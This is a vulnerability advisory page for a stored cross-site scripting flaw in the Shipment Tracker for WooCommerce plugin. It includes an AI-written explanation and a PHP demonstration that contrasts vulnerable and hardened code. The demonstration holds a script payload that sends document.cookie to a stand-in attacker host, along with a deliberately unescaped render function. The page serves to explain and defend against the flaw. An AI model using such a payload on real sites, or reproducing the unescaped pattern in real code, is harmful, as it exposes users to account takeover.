CVE-2026-39540
Description
Unauthenticated stored XSS in Shipment Tracker for Woocommerce <=1.5.3.2 allows arbitrary script injection via subscriber role.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The Shipment Tracker for Woocommerce plugin for WordPress, in versions 1.5.3.2 and earlier, contains a stored cross-site scripting (XSS) vulnerability. A user holding only the Subscriber role (the lowest default WordPress role) can inject script through input fields that are not properly sanitized, and the stored payload later executes in the browsers of other users who view it [1]. Note that the "Unauthenticated" wording in the description conflicts with the subscriber-role requirement stated in the same sentence; this narrative treats the attacker as an authenticated subscriber, as the description's own "via subscriber role" indicates.
Exploitation
An attacker needs a Subscriber-level account on a WordPress site running the vulnerable plugin. The attacker submits a script payload through a vulnerable input field (the narrative gives a shipment tracking number as the example); the server stores it without sanitization, and it executes later when a privileged user such as an administrator views the shipment details, or when visitors load a page that renders the stored value. Victim interaction is limited to viewing the page that contains the stored payload [1].
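The store-then-render pattern described in the Vulnerability and Exploitation sections, as an added illustration that is not the plugin's code (this page has no source context for the CVE): a constructed save/render pair for a tracking-number field, first persisting and echoing raw input, then validating against an allow-list on input and escaping at output. The field name, the in-memory storage array, the allow-list regex and the payload are all assumptions made for the example. Plain PHP is used so the file runs under php-cli; the equivalent WordPress calls are named in comments.

```php
<?php
declare(strict_types=1);

// Added example of the stored-XSS pattern, not the Shipment Tracker for
// WooCommerce plugin's code. Storage, field name, regex and payload are all
// constructed for illustration. In a real WordPress plugin the equivalents
// are sanitize_text_field() on input, esc_html()/esc_attr() on output, and
// current_user_can() plus wp_verify_nonce() around the save handler.

// --- Vulnerable pattern: store raw input, echo it raw in the admin view ---

function vulnerable_save(array &$storage, int $orderId, string $trackingNumber): void
{
    // No validation or capability check: whatever the subscriber submits
    // is persisted as-is (the analogue of update_post_meta() on raw $_POST).
    $storage[$orderId] = $trackingNumber;
}

function vulnerable_render(array $storage, int $orderId): string
{
    // Raw interpolation into HTML: a stored <script> tag becomes live markup
    // in the browser of whoever views the order (e.g. the administrator).
    $value = $storage[$orderId] ?? '';
    return '<td class="tracking">' . $value . '</td>';
}

// --- Hardened pattern: allow-list on input, contextual escaping on output ---

function hardened_save(array &$storage, int $orderId, string $trackingNumber): bool
{
    // Allow-list the expected shape of a tracking number and reject the rest.
    // The character set and length are assumptions for the example; real
    // carriers differ, but the point is to validate against a known format
    // rather than to strip "dangerous" characters.
    $clean = trim($trackingNumber);
    if (!preg_match('/^[A-Za-z0-9 _\-\/]{1,64}$/', $clean)) {
        return false;
    }
    $storage[$orderId] = $clean;
    return true;
}

function hardened_render(array $storage, int $orderId): string
{
    // Escape for the HTML-text context at the point of output (esc_html() in
    // WordPress). This is the control that still holds if validation is
    // bypassed or the stored value arrived through another code path.
    $value = $storage[$orderId] ?? '';
    return '<td class="tracking">'
        . htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '</td>';
}

// Constructed payload of the kind a subscriber could submit.
$payload = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Vulnerable path: the payload is stored and rendered as executable markup.
$vulnerableStorage = [];
vulnerable_save($vulnerableStorage, 42, $payload);
echo 'vulnerable: ' . vulnerable_render($vulnerableStorage, 42) . PHP_EOL;

// Hardened path: the payload is rejected on input ...
$hardenedStorage = [];
$accepted = hardened_save($hardenedStorage, 42, $payload);
echo 'hardened accepted payload: ' . ($accepted ? 'yes' : 'no') . PHP_EOL;

// ... and even if it had reached storage, output escaping neutralises it.
$hardenedStorage[42] = $payload;
echo 'hardened: ' . hardened_render($hardenedStorage, 42) . PHP_EOL;

// A legitimate value passes the allow-list and renders unchanged.
hardened_save($hardenedStorage, 43, '1Z999AA10123456784');
echo 'hardened legit: ' . hardened_render($hardenedStorage, 43) . PHP_EOL;
```

Run with `php stored_xss_example.php`. The two controls are deliberately independent: input validation narrows what a low-privileged user can persist, while output escaping is the one that actually prevents script execution, so a plugin that only does the former is still exposed if any other write path exists.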
Impact
Successful exploitation runs attacker-controlled JavaScript in the browser of every user who views the stored payload, whether a site visitor or an administrator. In an administrator's session the script can drive authenticated actions using the nonces present in the page, as well as redirect users, inject ads or deface content. Direct theft of the WordPress authentication cookie via document.cookie is prevented because WordPress sets that cookie HttpOnly, which is why session-riding in the admin context is the impact that matters most. Because the payload is stored server-side rather than reflected, a single submission reaches every user who loads the affected view [1].
Mitigation
Update the plugin to version 1.5.3.3 or later, which the reference reports as fixing the vulnerability [1]; note that the Patches section of this page has not yet identified the fix commit, so the fixed version rests on that reference alone. If updating is not immediately possible, Patchstack provides a mitigation rule that blocks attacks, and Patchstack users can enable auto-updates for vulnerable plugins [1].
AI Insight generated on Jun 15, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Shipment Tracker for Woocommerce, range: <=1.5.3.2
Patches
No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE. Mechanics are only generated when we can read the actual fix diff; without it, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
News mentions
No linked articles in our index yet.